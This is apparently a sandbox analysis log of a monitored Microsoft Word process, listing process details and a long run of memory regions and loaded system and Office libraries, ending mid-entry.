# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Dec 15 2017 17:49:06 # Log Creation Date: 10.01.2018 18:51:32.673 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x587de000" os_pid = "0x954" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 133 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 134 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 135 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 136 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 137 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 138 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 139 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 140 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 141 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 142 start_va = 0x100000 end_va = 0x106fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 143 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 144 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 145 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 146 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 147 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 148 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 149 start_va = 0x170000 end_va = 0x172fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 150 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 151 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 152 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 153 start_va = 0x2a0000 end_va = 0x2a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 154 start_va = 0x2b0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 155 start_va = 0x2c0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 156 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 157 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 158 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 159 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 160 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 161 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 162 start_va = 0x880000 end_va = 0x1c7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 163 start_va = 0x1c80000 end_va = 0x1f4efff entry_point = 0x1c80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 164 start_va = 0x1f50000 end_va = 0x2342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 165 start_va = 0x2350000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 166 start_va = 0x2450000 end_va = 0x252efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 167 start_va = 0x2540000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 168 start_va = 0x2580000 end_va = 0x2580fff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 169 start_va = 0x2590000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 170 start_va = 0x2690000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 171 start_va = 0x2780000 end_va = 0x2784fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 172 start_va = 0x2790000 end_va = 0x2790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 173 start_va = 0x27a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 174 start_va = 0x27b0000 end_va = 0x27b0fff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 175 start_va = 0x27c0000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 176 start_va = 0x28c0000 end_va = 0x297ffff entry_point = 0x28c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 177 start_va = 0x2980000 end_va = 0x2981fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002980000" filename = "" Region: id = 178 start_va = 0x2990000 end_va = 0x29c5fff entry_point = 0x2990000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 179 start_va = 0x29d0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 180 start_va = 0x29e0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 181 start_va = 0x2ae0000 end_va = 0x2ae0fff entry_point = 0x2ae0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 182 start_va = 0x2af0000 end_va = 0x2b14fff entry_point = 0x2af0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db") Region: id = 183 start_va = 0x2c20000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 184 start_va = 0x2e20000 end_va = 0x2e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e20000" filename = "" Region: id = 185 start_va = 0x2e30000 end_va = 0x2e31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e30000" filename = "" Region: id = 186 start_va = 0x2e40000 end_va = 0x2e40fff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 187 start_va = 0x2e50000 end_va = 0x2e60fff entry_point = 0x2e50000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 188 start_va = 0x2e70000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 189 start_va = 0x2e90000 end_va = 0x2e94fff entry_point = 0x2e90000 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 190 start_va = 0x2ea0000 end_va = 0x2ebefff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 191 start_va = 0x2ec0000 end_va = 0x2f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 192 start_va = 0x2f40000 end_va = 0x303ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 193 start_va = 0x3040000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 194 start_va = 0x3140000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 195 start_va = 0x3160000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 196 start_va = 0x3180000 end_va = 0x3183fff entry_point = 0x3180000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 197 start_va = 0x3190000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 198 start_va = 0x3290000 end_va = 0x338ffff entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 199 start_va = 0x3390000 end_va = 0x378ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003390000" filename = "" Region: id = 200 start_va = 0x3790000 end_va = 0x40bffff entry_point = 0x3790000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 201 start_va = 0x40c0000 end_va = 0x40dffff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 202 start_va = 0x4130000 end_va = 0x422ffff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 203 start_va = 0x4230000 end_va = 0x42aefff entry_point = 0x4230000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 204 start_va = 0x42e0000 end_va = 0x42effff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 205 start_va = 0x43d0000 end_va = 0x43dffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 206 start_va = 0x43e0000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 207 start_va = 0x4520000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 208 start_va = 0x45a0000 end_va = 0x4d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 209 start_va = 0x4e90000 end_va = 0x4f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 210 start_va = 0x5080000 end_va = 0x517ffff entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 211 start_va = 0x51c0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 212 start_va = 0x52d0000 end_va = 0x52dffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 213 start_va = 0x53a0000 end_va = 0x549ffff entry_point = 0x0 region_type = private name = "private_0x00000000053a0000" filename = "" Region: id = 214 start_va = 0x54a0000 end_va = 0x589ffff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 215 start_va = 0x58a0000 end_va = 0x689ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058a0000" filename = "" Region: id = 216 start_va = 0x6970000 end_va = 0x69effff entry_point = 0x0 region_type = private name = "private_0x0000000006970000" filename = "" Region: id = 217 start_va = 0x6a10000 end_va = 0x6a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 218 start_va = 0x6a90000 end_va = 0x6b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 219 start_va = 0x6bb0000 end_va = 0x6c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006bb0000" filename = "" Region: id = 220 start_va = 0x6ce0000 end_va = 0x6ddffff entry_point = 0x0 region_type = private name = "private_0x0000000006ce0000" filename = "" Region: id = 221 start_va = 0x6e00000 end_va = 0x6e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 222 start_va = 0x6e80000 end_va = 0x727ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e80000" filename = "" Region: id = 223 start_va = 0x7280000 end_va = 0x7a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000007280000" filename = "" Region: id = 224 start_va = 0x7a80000 end_va = 0x7e80fff entry_point = 0x0 region_type = private name = "private_0x0000000007a80000" filename = "" Region: id = 225 start_va = 0x7e90000 end_va = 0x8290fff entry_point = 0x0 region_type = private name = "private_0x0000000007e90000" filename = "" Region: id = 226 start_va = 0x82a0000 end_va = 0x86a0fff entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 227 start_va = 0x86b0000 end_va = 0x88affff entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 228 start_va = 0x88b0000 end_va = 0x8d6ffff entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 229 start_va = 0x8d70000 end_va = 0x916ffff entry_point = 0x0 region_type = private name = "private_0x0000000008d70000" filename = "" Region: id = 230 start_va = 0x36e80000 end_va = 0x36e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000036e80000" filename = "" Region: id = 231 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 232 start_va = 0x744a0000 end_va = 0x744d2fff entry_point = 0x744a0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 233 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 234 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 235 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 236 start_va = 0x77260000 end_va = 0x77266fff entry_point = 0x77260000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 237 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 238 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 239 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 240 start_va = 0x13fc00000 end_va = 0x13fddafff entry_point = 0x13fc00000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe") Region: id = 241 start_va = 0x7febe960000 end_va = 0x7febe96ffff entry_point = 0x0 region_type = private name = "private_0x000007febe960000" filename = "" Region: id = 242 start_va = 0x7fee39d0000 end_va = 0x7fee44c8fff entry_point = 0x7fee39d0000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 243 start_va = 0x7fee44d0000 end_va = 0x7fee46f2fff entry_point = 0x7fee44d0000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 244 start_va = 0x7fee4860000 end_va = 0x7fee4899fff entry_point = 0x7fee4860000 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 245 start_va = 0x7fee48a0000 end_va = 0x7fee4938fff entry_point = 0x7fee48a0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 246 start_va = 0x7fee4940000 end_va = 0x7fee4abdfff entry_point = 0x7fee4940000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 247 start_va = 0x7fee4ac0000 end_va = 0x7fee4c8ffff entry_point = 0x7fee4ac0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 248 start_va = 0x7fee4c90000 end_va = 0x7fee4dfffff entry_point = 0x7fee4c90000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll") Region: id = 249 start_va = 0x7fee4e00000 end_va = 0x7fee4f7afff entry_point = 0x7fee4e00000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 250 start_va = 0x7fee4f80000 end_va = 0x7fee503bfff entry_point = 0x7fee4f80000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 251 start_va = 0x7fee5040000 end_va = 0x7fee9e7efff entry_point = 0x7fee5040000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 252 start_va = 0x7fee9e80000 end_va = 0x7feea7a0fff entry_point = 0x7fee9e80000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 253 start_va = 0x7feea7b0000 end_va = 0x7feeaab7fff entry_point = 0x7feea7b0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 254 start_va = 0x7feeaac0000 end_va = 0x7feebd9bfff entry_point = 0x7feeaac0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 255 start_va = 0x7feebda0000 end_va = 0x7feec56bfff entry_point = 0x7feebda0000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 256 start_va = 0x7feec570000 end_va = 0x7feece5afff entry_point = 0x7feec570000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 257 start_va = 0x7feece60000 end_va = 0x7feed2d7fff entry_point = 0x7feece60000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 258 start_va = 0x7feed2e0000 end_va = 0x7feed5e3fff entry_point = 0x7feed2e0000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 259 start_va = 0x7feed5f0000 end_va = 0x7feee75bfff entry_point = 0x7feed5f0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 260 start_va = 0x7feee7d0000 end_va = 0x7feee895fff entry_point = 0x7feee7d0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 261 start_va = 0x7feee8a0000 end_va = 0x7fef0c3efff entry_point = 0x7feee8a0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 262 start_va = 0x7fef10e0000 end_va = 0x7fef114efff entry_point = 0x7fef10e0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 263 start_va = 0x7fef1150000 end_va = 0x7fef1176fff entry_point = 0x7fef1150000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 264 start_va = 0x7fef1260000 end_va = 0x7fef129afff entry_point = 0x7fef1260000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 265 start_va = 0x7fef3780000 end_va = 0x7fef378bfff entry_point = 0x7fef3780000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 266 start_va = 0x7fef3bb0000 end_va = 0x7fef3bb2fff entry_point = 0x7fef3bb0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 267 start_va = 0x7fef3bc0000 end_va = 0x7fef3bc2fff entry_point = 0x7fef3bc0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 268 start_va = 0x7fef3d90000 end_va = 0x7fef3d92fff entry_point = 0x7fef3d90000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 269 start_va = 0x7fef3da0000 end_va = 0x7fef3da2fff entry_point = 0x7fef3da0000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 270 start_va = 0x7fef3db0000 end_va = 0x7fef3db2fff entry_point = 0x7fef3db0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 271 start_va = 0x7fef3dc0000 end_va = 0x7fef3dc2fff entry_point = 0x7fef3dc0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 272 start_va = 0x7fef3dd0000 end_va = 0x7fef3ec1fff entry_point = 0x7fef3dd0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 273 start_va = 0x7fef3ed0000 end_va = 0x7fef3ed6fff entry_point = 0x7fef3ed0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 274 start_va = 0x7fef3ee0000 end_va = 0x7fef4008fff entry_point = 0x7fef3ee0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 275 start_va = 0x7fef4010000 end_va = 0x7fef4089fff entry_point = 0x7fef4010000 region_type = mapped_file name = "appvisvstream64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll") Region: id = 276 start_va = 0x7fef4090000 end_va = 0x7fef42c5fff entry_point = 0x7fef4090000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft 